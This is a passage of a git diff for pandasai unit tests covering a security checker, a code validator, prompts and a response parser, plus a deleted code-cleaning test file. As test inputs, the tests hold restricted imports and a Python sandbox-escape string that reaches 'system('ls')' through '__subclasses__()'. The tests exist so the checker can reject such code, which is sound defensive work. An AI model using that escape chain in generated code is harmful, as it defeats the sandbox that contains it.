+ code = "__import__('os')"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(str(context.exception), "Restricted builtins are used!")
+
+ def test_is_unsafe_with_unsafe_method(self):
+ """Test detection of unsafe operations."""
+ code = "df.to_csv('file.csv')"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception),
+ "The code is unsafe and can lead to I/O operations or other malicious operations that are not permitted!",
+ )
+
+ def test_check_with_safe_code(self):
+ """Test that safe code passes without raising an error."""
+ code = "x = 5 + 5"
+ try:
+ self.security_checker.check(code)
+ except MaliciousCodeGenerated:
+ self.fail("check() raised MaliciousCodeGenerated unexpectedly!")
+
+ def test_check_with_multiple_checks(self):
+ """Test multiple checks in one code block."""
+ code = "import os\nx = 5\nobj._private_method()"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+ def test_check_with_jailbreak_and_unsafe_methods(self):
+ """Test detection of both jailbreak and unsafe methods in one code block."""
+ code = "__import__('os')\ndf.to_excel('file.xlsx')"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(str(context.exception), "Restricted builtins are used!")
+
+ def test_check_with_multiple_restricted_imports(self):
+ """Test detection of multiple restricted imports."""
+ code = "import os\nfrom restricted_lib import something"
+ with self.assertRaises(MaliciousCodeGenerated) as context:
+ self.security_checker.check(code)
+ self.assertEqual(
+ str(context.exception), "Restricted library import detected: os"
+ )
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/code_generation/test_code_validation.py b/tests/unit_tests/core/code_generation/test_code_validation.py
new file mode 100644
index 000000000..469efd695
--- /dev/null
+++ b/tests/unit_tests/core/code_generation/test_code_validation.py
@@ -0,0 +1,72 @@
+import unittest
+from unittest.mock import MagicMock
+import ast
+from pandasai.core.code_generation.code_validation import CodeRequirementValidator
+from pandasai.agent.state import AgentState
+from pandasai.exceptions import ExecuteSQLQueryNotUsed
+
+
+class TestCodeRequirementValidator(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for CodeRequirementValidator."""
+ self.context = MagicMock(spec=AgentState)
+ self.context.config.direct_sql = False # Default to False
+ self.validator = CodeRequirementValidator(self.context)
+
+ def test_validate_code_without_execute_sql_query(self):
+ """Test validation when direct_sql is enabled but execute_sql_query is not used."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = "result = 5 + 5" # Code without execute_sql_query
+
+ with self.assertRaises(ExecuteSQLQueryNotUsed) as context:
+ self.validator.validate(code)
+
+ self.assertEqual(
+ str(context.exception),
+ "The code must execute SQL queries using the `execute_sql_query` function, which is already defined!",
+ )
+
+ def test_validate_code_with_execute_sql_query(self):
+ """Test validation when execute_sql_query is used."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = "execute_sql_query('SELECT * FROM table')" # Code with execute_sql_query
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+ def test_validate_code_with_no_direct_sql(self):
+ """Test validation when direct_sql is disabled."""
+ self.context.config.direct_sql = False # Disable direct_sql
+ code = "result = 5 + 5" # Any code should pass
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+ def test_validate_code_with_function_calls(self):
+ """Test validation with various function calls."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = """
+def some_function():
+ pass
+some_function()
+execute_sql_query('SELECT * FROM table')
+""" # Code with a function call and execute_sql_query
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+ def test_validate_code_with_multiple_calls(self):
+ """Test validation with multiple function calls."""
+ self.context.config.direct_sql = True # Enable direct_sql
+ code = """
+import pandas as pd
+df = pd.DataFrame()
+execute_sql_query('SELECT * FROM table')
+""" # Code with pandas and execute_sql_query
+
+ result = self.validator.validate(code)
+ self.assertTrue(result)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/core/prompts/test_prompts.py b/tests/unit_tests/core/prompts/test_prompts.py
new file mode 100644
index 000000000..2ad31d953
--- /dev/null
+++ b/tests/unit_tests/core/prompts/test_prompts.py
@@ -0,0 +1,93 @@
+import unittest
+from unittest.mock import MagicMock
+from pandasai.core.prompts import (
+ get_chat_prompt,
+ get_chat_prompt_for_sql,
+ get_correct_error_prompt,
+ get_correct_error_prompt_for_sql,
+ get_correct_output_type_error_prompt,
+)
+from pandasai.agent.state import AgentState
+from pandasai.core.prompts.base import BasePrompt
+from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
+from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
+ CorrectExecuteSQLQueryUsageErrorPrompt,
+)
+from pandasai.core.prompts.correct_output_type_error_prompt import (
+ CorrectOutputTypeErrorPrompt,
+)
+
+
+class TestChatPrompts(unittest.TestCase):
+ def setUp(self):
+ """Set up the test environment for chat prompts."""
+ self.context = MagicMock(spec=AgentState)
+ memory = MagicMock()
+ memory.count.return_value = 1
+ self.context.memory = memory
+
+ def test_get_chat_prompt(self):
+ """Test the get_chat_prompt function."""
+ self.context.config.data_viz_library = "seaborn"
+ self.context.output_type = "dataframe"
+
+ prompt = get_chat_prompt(self.context)
+
+ self.assertIsInstance(prompt, BasePrompt)
+
+ self.assertEqual("seaborn" in prompt.to_string(), True)
+
+ def test_get_chat_prompt_default_viz_lib(self):
+ """Test get_chat_prompt with default visualization library."""
+ self.context.config.data_viz_library = None
+ self.context.output_type = "dataframe"
+
+ prompt = get_chat_prompt(self.context)
+
+ self.assertIsInstance(prompt, BasePrompt)
+ self.assertEqual("matplotlib" in prompt.to_string(), True)
+
+ def test_get_chat_prompt_for_sql(self):
+ """Test the get_chat_prompt_for_sql function."""
+ self.context.config.data_viz_library = "plotly"
+ self.context.output_type = "sql"
+
+ prompt = get_chat_prompt_for_sql(self.context)
+
+ self.assertIsInstance(prompt, BasePrompt)
+ self.assertEqual("plotly" in prompt.to_string(), True)
+
+ def test_get_correct_error_prompt(self):
+ """Test the get_correct_error_prompt function."""
+ code = "some code"
+ traceback_error = "Some traceback error"
+
+ prompt = get_correct_error_prompt(self.context, code, traceback_error)
+
+ self.assertIsInstance(prompt, CorrectErrorPrompt)
+
+ def test_get_correct_error_prompt_for_sql(self):
+ """Test the get_correct_error_prompt_for_sql function."""
+ code = "SELECT * FROM table"
+ traceback_error = "SQL error"
+
+ prompt = get_correct_error_prompt_for_sql(self.context, code, traceback_error)
+
+ self.assertIsInstance(prompt, CorrectExecuteSQLQueryUsageErrorPrompt)
+
+ def test_get_correct_output_type_error_prompt(self):
+ """Test the get_correct_output_type_error_prompt function."""
+ code = "some code"
+ traceback_error = "Output type error"
+
+ self.context.output_type = "expected_output_type"
+
+ prompt = get_correct_output_type_error_prompt(
+ self.context, code, traceback_error
+ )
+
+ self.assertIsInstance(prompt, CorrectOutputTypeErrorPrompt)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/unit_tests/dataframe/test_dataframe.py b/tests/unit_tests/dataframe/test_dataframe.py
index b20bed5c3..810d9b956 100644
--- a/tests/unit_tests/dataframe/test_dataframe.py
+++ b/tests/unit_tests/dataframe/test_dataframe.py
@@ -2,7 +2,7 @@
import pandas as pd
from unittest.mock import Mock, patch
from pandasai.dataframe.base import DataFrame
-from pandasai.agent.agent import Agent
+from pandasai.agent import Agent
import pandasai
@@ -31,20 +31,16 @@ def test_dataframe_initialization(self, sample_data, sample_df):
assert isinstance(sample_df, pd.DataFrame)
assert sample_df.equals(pd.DataFrame(sample_data))
- def test_from_pandas(self, sample_data):
- pandas_df = pd.DataFrame(sample_data)
- pandasai_df = DataFrame.from_pandas(pandas_df)
- assert isinstance(pandasai_df, DataFrame)
- assert pandasai_df.equals(pandas_df)
-
def test_dataframe_operations(self, sample_df):
assert len(sample_df) == 5
assert list(sample_df.columns) == ["Name", "Age", "City", "Salary"]
assert sample_df["Salary"].mean() == 76800
- @patch("pandasai.agent.agent.Agent")
- def test_chat_creates_agent(self, mock_agent, sample_df):
- assert sample_df._agent is None
+ @patch("pandasai.agent.Agent")
+ @patch("os.environ")
+ def test_chat_creates_agent(self, mock_env, mock_agent, sample_data):
+ sample_df = DataFrame(sample_data)
+ mock_env.return_value = {"PANDASAI_API_URL": "localhost:8000"}
sample_df.chat("Test query")
mock_agent.assert_called_once_with([sample_df], config=sample_df.config)
@@ -81,7 +77,7 @@ def test_chat_method(self, sample_df):
def test_chat_with_config(self, sample_df):
config = {"max_retries": 100}
- with patch("pandasai.agent.agent.Agent") as mock_agent:
+ with patch("pandasai.agent.Agent") as mock_agent:
sample_df.chat("Test query", config=config)
mock_agent.assert_called_once_with([sample_df], config=sample_df.config)
assert sample_df.config.max_retries == 100
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 68800eeb8..4bb1b1591 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -60,7 +60,7 @@ def test_load_from_cache(self, sample_schema):
with patch("os.path.exists", return_value=True), patch(
"os.path.getmtime", return_value=pd.Timestamp.now().timestamp()
), patch(
- "pandasai.dataframe.loader.DatasetLoader._read_cache"
+ "pandasai.data_loader.loader.DatasetLoader._read_csv_or_parquet"
) as mock_read_cache, patch(
"builtins.open", mock_open(read_data=str(sample_schema))
):
@@ -116,7 +116,7 @@ def test_get_cache_file_path_with_destination_path(self, sample_schema):
loader.schema = sample_schema
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path == "datasets/test/users/users.parquet"
+ assert cache_path.endswith("datasets/test/users/users.parquet")
def test_get_cache_file_path_without_destination_path(self, sample_schema):
schema_without_path = sample_schema.copy()
@@ -125,7 +125,7 @@ def test_get_cache_file_path_without_destination_path(self, sample_schema):
loader.schema = schema_without_path
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path == "datasets/test/users/data.parquet"
+ assert cache_path.endswith("datasets/test/users/data.parquet")
def test_is_cache_valid(self, sample_schema):
loader = DatasetLoader()
@@ -154,7 +154,7 @@ def test_read_cache_parquet(self, sample_schema):
mock_df = pd.DataFrame({"col1": [1, 2, 3], "col2": ["a", "b", "c"]})
with patch("pandas.read_parquet", return_value=mock_df):
- result = loader._read_cache("dummy_path")
+ result = loader._read_csv_or_parquet("dummy_path", "parquet")
assert isinstance(result, pd.DataFrame)
assert result.equals(mock_df)
@@ -166,7 +166,7 @@ def test_read_cache_csv(self, sample_schema):
mock_df = pd.DataFrame({"col1": [1, 2, 3], "col2": ["a", "b", "c"]})
with patch("pandas.read_csv", return_value=mock_df):
- result = loader._read_cache("dummy_path")
+ result = loader._read_csv_or_parquet("dummy_path", "csv")
assert isinstance(result, pd.DataFrame)
assert result.equals(mock_df)
@@ -176,8 +176,8 @@ def test_read_cache_unsupported_format(self, sample_schema):
loader = DatasetLoader()
loader.schema = schema_unsupported
- with pytest.raises(ValueError, match="Unsupported cache format: unsupported"):
- loader._read_cache("dummy_path")
+ with pytest.raises(ValueError, match="Unsupported file format: unsupported"):
+ loader._read_csv_or_parquet("dummy_path", "unsupported")
def test_apply_transformations(self, sample_schema):
loader = DatasetLoader()
@@ -226,6 +226,3 @@ def test_cache_data(self, sample_schema):
with pytest.raises(ValueError, match="Unsupported cache format: unsupported"):
loader._cache_data(df, "dummy_path")
-
-
-# Add more tests for _load_from_source and other methods as needed
diff --git a/tests/unit_tests/helpers/test_optional_dependency.py b/tests/unit_tests/helpers/test_optional_dependency.py
index e06008ed7..6360fc662 100644
--- a/tests/unit_tests/helpers/test_optional_dependency.py
+++ b/tests/unit_tests/helpers/test_optional_dependency.py
@@ -8,10 +8,16 @@
import pytest
-from pandasai.helpers.optional import VERSIONS, get_environment, import_dependency
-from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
-from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
-from pandasai.safe_libs.restricted_pandas import RestrictedPandas
+from pandasai.core.code_execution.environment import (
+ VERSIONS,
+ get_environment,
+ import_dependency,
+)
+from pandasai.core.code_execution.safe_libs.restricted_matplotlib import (
+ RestrictedMatplotlib,
+)
+from pandasai.core.code_execution.safe_libs.restricted_numpy import RestrictedNumpy
+from pandasai.core.code_execution.safe_libs.restricted_pandas import RestrictedPandas
def test_import_optional():
diff --git a/tests/unit_tests/helpers/test_responses.py b/tests/unit_tests/helpers/test_responses.py
index 3c927a8ea..bf4337421 100644
--- a/tests/unit_tests/helpers/test_responses.py
+++ b/tests/unit_tests/helpers/test_responses.py
@@ -1,59 +1,82 @@
import unittest
+from pandasai.exceptions import InvalidOutputValueMismatch
+from pandasai.core.response.base import ResponseParser
+from pandasai.core.response.response_types import Chart, DataFrame, Number, String
+import pandas as pd
-from PIL import Image
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.responses.context import Context
-from pandasai.responses.response_parser import ResponseParser
-from pandasai.schemas.df_config import Config
-
-
-class TestFormatPlot(unittest.TestCase):
+class TestResponseParser(unittest.TestCase):
@classmethod
def setUpClass(cls):
- llm = FakeLLM(output=None)
- config = {"llm": llm, "enable_cache": True}
- config = Config(**config)
- context = Context(config=config, logger=Logger())
- cls.response_parser = ResponseParser(context)
+ cls.response_parser = ResponseParser()
- def test_display_plot_from_file(self):
- result = {"type": "plot", "value": "path/to/plot.png"}
- with unittest.mock.patch(
- "builtins.open", unittest.mock.mock_open(read_data=b"")
- ):
- with unittest.mock.patch(
- "PIL.Image.open", return_value=Image.new("RGB", (100, 100))
- ):
- with unittest.mock.patch("PIL.Image.Image.show") as mock_show:
- self.assertEqual(
- self.response_parser.format_plot(result), "path/to/plot.png"
- )
- mock_show.assert_called_once()
-
- def test_display_plot_from_bytes(self):
- result = {"type": "plot", "value": b"data:image/png;base64 fake_image_data"}
- with unittest.mock.patch(
- "PIL.Image.open", return_value=Image.new("RGB", (100, 100))
- ):
- with unittest.mock.patch("PIL.Image.Image.show"):
- self.assertEqual(
- self.response_parser.format_plot(result),
- b"data:image/png;base64 fake_image_data",
- )
-
- def test_return_value_without_display(self):
+ def test_parse_valid_number(self):
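+ """A number result parses into a Number response."""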
+ result = {"type": "number", "value": 42}
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, Number)
+
+ def test_parse_valid_string(self):
+ result = {"type": "string", "value": "test string"}
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, String)
+
+ def test_parse_valid_dataframe(self):
+ result = {
+ "type": "dataframe",
+ "value": pd.DataFrame({"col1": [1, 2, 3], "col2": [4, 5, 6]}),
+ }
+
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, DataFrame)
+
+ def test_parse_valid_plot(self):
result = {"type": "plot", "value": "path/to/plot.png"}
- with unittest.mock.patch(
- "builtins.open", unittest.mock.mock_open(read_data=b"")
- ):
- with unittest.mock.patch(
- "PIL.Image.open", return_value=Image.new("RGB", (100, 100))
- ):
- with unittest.mock.patch.object(
- self.response_parser._context.config, "open_charts", False
- ):
- self.assertEqual(
- self.response_parser.format_plot(result), "path/to/plot.png"
- )
+ response = self.response_parser.parse(result)
+ self.assertIsInstance(response, Chart)
+
+ def test_parse_invalid_type(self):
+ result = {"type": "unknown", "value": "test"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser.parse(result)
+
+ def test_parse_missing_type(self):
+ result = {"value": "test"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser.parse(result)
+
+ def test_parse_missing_value(self):
+ result = {"type": "string"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser.parse(result)
+
+ def test_validate_invalid_number_type(self):
+ result = {"type": "number", "value": "not a number"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_invalid_string_type(self):
+ result = {"type": "string", "value": 123}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_invalid_dataframe_type(self):
+ result = {"type": "dataframe", "value": "not a dataframe"}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_invalid_plot_type(self):
+ result = {"type": "plot", "value": 12345}
+ with self.assertRaises(InvalidOutputValueMismatch):
+ self.response_parser._validate_response(result)
+
+ def test_validate_plot_with_base64(self):
+ result = {"type": "plot", "value": "data:image/png;base64 fake_image_data"}
+ self.assertTrue(self.response_parser._validate_response(result))
+
+ def test_validate_valid_plot_path(self):
+ result = {"type": "plot", "value": "/valid/path/to/plot.png"}
+ self.assertTrue(self.response_parser._validate_response(result))
+
+
+if __name__ == "__main__":
+ unittest.main()
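Taken together, the rewritten assertions pin down a small contract for the new parser: a well-formed {"type", "value"} result dict is wrapped in the matching response type, and anything malformed raises InvalidOutputValueMismatch. A sketch of that round trip, using only names imported in this diff:

import pandas as pd

from pandasai.core.response.base import ResponseParser
from pandasai.core.response.response_types import DataFrame, Number
from pandasai.exceptions import InvalidOutputValueMismatch

parser = ResponseParser()

# Well-formed results are wrapped in the matching response type.
assert isinstance(parser.parse({"type": "number", "value": 42}), Number)
assert isinstance(
    parser.parse({"type": "dataframe", "value": pd.DataFrame({"col1": [1, 2]})}),
    DataFrame,
)

# Malformed results (unknown or missing type, mismatched value) raise
# InvalidOutputValueMismatch, as the negative tests above assert.
try:
    parser.parse({"type": "unknown", "value": "test"})
except InvalidOutputValueMismatch:
    pass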
diff --git a/tests/unit_tests/llms/test_bamboo_llm.py b/tests/unit_tests/llms/test_bamboo_llm.py
index 2b9b1c870..6feff2b9f 100644
--- a/tests/unit_tests/llms/test_bamboo_llm.py
+++ b/tests/unit_tests/llms/test_bamboo_llm.py
@@ -3,7 +3,7 @@
from pandasai.exceptions import PandasAIApiCallError
from pandasai.llm.bamboo_llm import BambooLLM
-from pandasai.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class MockHttpResponse:
@@ -11,7 +11,7 @@ def __init__(self, status_code):
self.status_code = status_code
def json(self):
- return {"data": "Hello World", "message": "test"}
+ return {"answer": "Hello World", "message": "test"}
class TestBambooLLM(unittest.TestCase):
@@ -39,11 +39,10 @@ def test_call_method(self, mock_request):
call_args = mock_request.call_args_list[0][0]
mock_request.assert_called_once()
assert call_args[1] == "POST"
- assert call_args[2] == "/llm/chat"
+ assert call_args[2] == "/query"
assert mock_request.call_args_list[0][1] == {
"json": {
- "code": ["print('Hello')", "for i in range(10): print(i)"],
- "query": ["What is Chroma?", "How does it work?"],
+ "prompt": "instruction",
}
}
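The updated expectations document the new wire contract: a single prompt string is POSTed to /query and answered with an "answer" field (previously "data"). A hedged sketch of that exchange with plain requests; the host below is a placeholder, and the real BambooLLM client adds auth and error handling on top:

import requests

# Illustrative only: the endpoint path and payload/response keys come from
# the updated test expectations; the base URL is hypothetical.
resp = requests.post(
    "https://api.example.com/query",
    json={"prompt": "instruction"},
)
answer = resp.json()["answer"]  # formerly resp.json()["data"]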
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
deleted file mode 100644
index e7520b19e..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ /dev/null
@@ -1,917 +0,0 @@
-"""Unit tests for the CodeCleaning class"""
-
-import ast
-import uuid
-from typing import Optional
-from unittest.mock import MagicMock, patch
-
-import pytest
-
-from pandasai import Agent
-from pandasai.dataframe.base import DataFrame
-from pandasai.exceptions import (
- BadImportError,
- InvalidConfigError,
- MaliciousQueryError,
-)
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.code_cleaning import CodeCleaning, CodeExecutionContext
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.schemas.df_config import Config
-
-
-class MockDataframe:
- table_name = "allowed_table"
-
- def __init__(self, table_name="test"):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return self.name
-
-
-class TestCodeCleaning:
- """Unit tests for the CodeCleaning class"""
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def logger(self):
- return Logger()
-
- @pytest.fixture
- def config_with_direct_sql(self):
- return Config(
- llm=FakeLLM(output=""),
- enable_cache=False,
- direct_sql=True,
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def agent(self, llm, sample_df):
- return Agent([sample_df], config={"llm": llm, "enable_cache": False})
-
- @pytest.fixture
- def agent_with_connector(self, llm, pgsql_connector: DataFrame):
- return Agent(
- [pgsql_connector],
- config={"llm": llm, "enable_cache": False, "direct_sql": True},
- )
-
- @pytest.fixture
- def code_cleaning(self, agent: Agent):
- return CodeCleaning()
-
- @pytest.fixture
- def exec_context(self) -> MagicMock:
- return CodeExecutionContext(uuid.uuid4())
-
- @pytest.fixture
- @patch("extensions.connectors.sql.pandasai_sql", autospec=True)
- def sql_connector(self, create_engine):
- return DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- @pytest.fixture
- @patch("extensions.connectors.sql.pandasai_sql", autospec=True)
- def pgsql_connector(self, create_engine):
- return DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- def test_run_code_for_calculations(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- code = """result = {'type': 'number', 'value': 1 + 1}"""
- output = code_cleaning.execute(code, context=context, logger=logger)
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_run_code_invalid_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- with pytest.raises(Exception):
- code_cleaning.execute("1 +", context=context, logger=logger)
-
- def test_clean_code_raise_not_whitelisted_lib(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- builtins_code = """import scipy
-result = {'type': 'number', 'value': set([1, 2, 3])}"""
-
- with pytest.raises(BadImportError):
- code_cleaning.execute(builtins_code, context=context, logger=logger)
-
- def test_clean_code_removes_jailbreak_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """__builtins__['str'].__class__.__mro__[-1].__subclasses__()[140].__init__.__globals__['system']('ls')
-print('hello world')"""
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_remove_environment_defaults(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- pandas_code = """import pandas as pd
-print('hello world')
-"""
- output = code_cleaning.execute(pandas_code, context=context, logger=logger)
-
- assert output.output == """print('hello world')"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_whitelist_import(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that an installed whitelisted library is added to the environment."""
- safe_code = """
-import numpy as np
-np.array()
-"""
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert output.output == """np.array()"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_raise_bad_import_error(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import os
-print(os.listdir())
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_accesses_node_id(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that value.func.value.id is accessed safely in _check_is_df_declaration."""
- pandas_code = """unique_countries = dfs[0]['country'].unique()
-smallest_countries = df.sort_values(by='area').head()"""
- output = code_cleaning.execute(pandas_code, context=context, logger=logger)
-
- assert output.output == pandas_code
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_remove_dfs_overwrites(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- hallucinated_code = """dfs = [pd.DataFrame([1,2,3])]
-print(dfs)"""
- output = code_cleaning.execute(
- hallucinated_code, context=context, logger=logger
- )
-
- assert output.output == """print(dfs)"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_custom_whitelisted_dependencies(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- code = """
-import my_custom_library
-my_custom_library.do_something()
-"""
-
- with pytest.raises(BadImportError):
- code_cleaning.execute(code, context=context, logger=logger)
-
- code_cleaning._config.custom_whitelisted_dependencies = ["my_custom_library"]
- output = code_cleaning.execute(code, context=context, logger=logger)
-
- print(code_cleaning._additional_dependencies)
- assert output.output == "my_custom_library.do_something()"
- assert (
- code_cleaning._additional_dependencies[0]["module"] == "my_custom_library"
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_validate_true_direct_sql_with_two_different_connector(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- sql_connector,
- pgsql_connector,
- ):
- # no exception is raised when a single connector is used
- # an exception is raised when two different connectors are used
- with pytest.raises(InvalidConfigError):
- context.config.direct_sql = True
- context.dfs = [sql_connector, pgsql_connector]
- code_cleaning.execute(
- "np.array()\nexecute_sql_query()", context=context, logger=logger
- )
-
- def test_clean_code_direct_sql_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- agent_with_connector: Agent,
- sql_connector,
- pgsql_connector,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is True"""
- safe_code = """
-import numpy as np
-def execute_sql_query(sql_query: str) -> pd.DataFrame:
- # code to connect to the database and execute the query
- # ...
- # return the result as a dataframe
- return pd.DataFrame()
-np.array()
-execute_sql_query()
-"""
- context.config.direct_sql = True
- context.dfs = [pgsql_connector, pgsql_connector]
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert output.output == "np.array()\nexecute_sql_query()"
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_direct_sql_code_false(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is False"""
- safe_code = """
-import numpy as np
-def execute_sql_query(sql_query: str) -> pd.DataFrame:
- # code to connect to the database and execute the query
- # ...
- # return the result as a dataframe
- return pd.DataFrame()
-np.array()
-"""
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
- assert (
- output.output
- == """def execute_sql_query(sql_query: str) ->pd.DataFrame:
- return pd.DataFrame()
-
-
-np.array()"""
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_check_is_query_using_relevant_table_invalid_query(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("sql_query = 'SELECT * FROM your_table'").body[0]
-
- code_cleaning._dfs = [MockDataframe("allowed_table")]
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- def test_check_is_query_using_relevant_table_valid_query(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("sql_query = 'SELECT * FROM allowed_table'").body[0]
-
- code_cleaning._dfs = [MockDataframe("allowed_table")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.value == "SELECT * FROM allowed_table"
-
- def test_check_is_query_using_relevant_table_multiple_tables(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "sql_query = 'SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id'"
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("table1"), MockDataframe("table2")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == "SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id"
- )
-
- def test_check_is_query_using_relevant_table_multiple_tables_using_alias_with_quote(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "sql_query = 'SELECT table1.id AS id, table1.author_id, table2.hidden AS is_hidden, table3.text AS comment_text FROM table1 LEFT JOIN table2 ON table1.id = table2.feed_message_id LEFT JOIN table3 ON table1.id = table3.feed_message_id'"
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [
- MockObject("table1"),
- MockObject("table2"),
- MockObject("table3"),
- ]
-
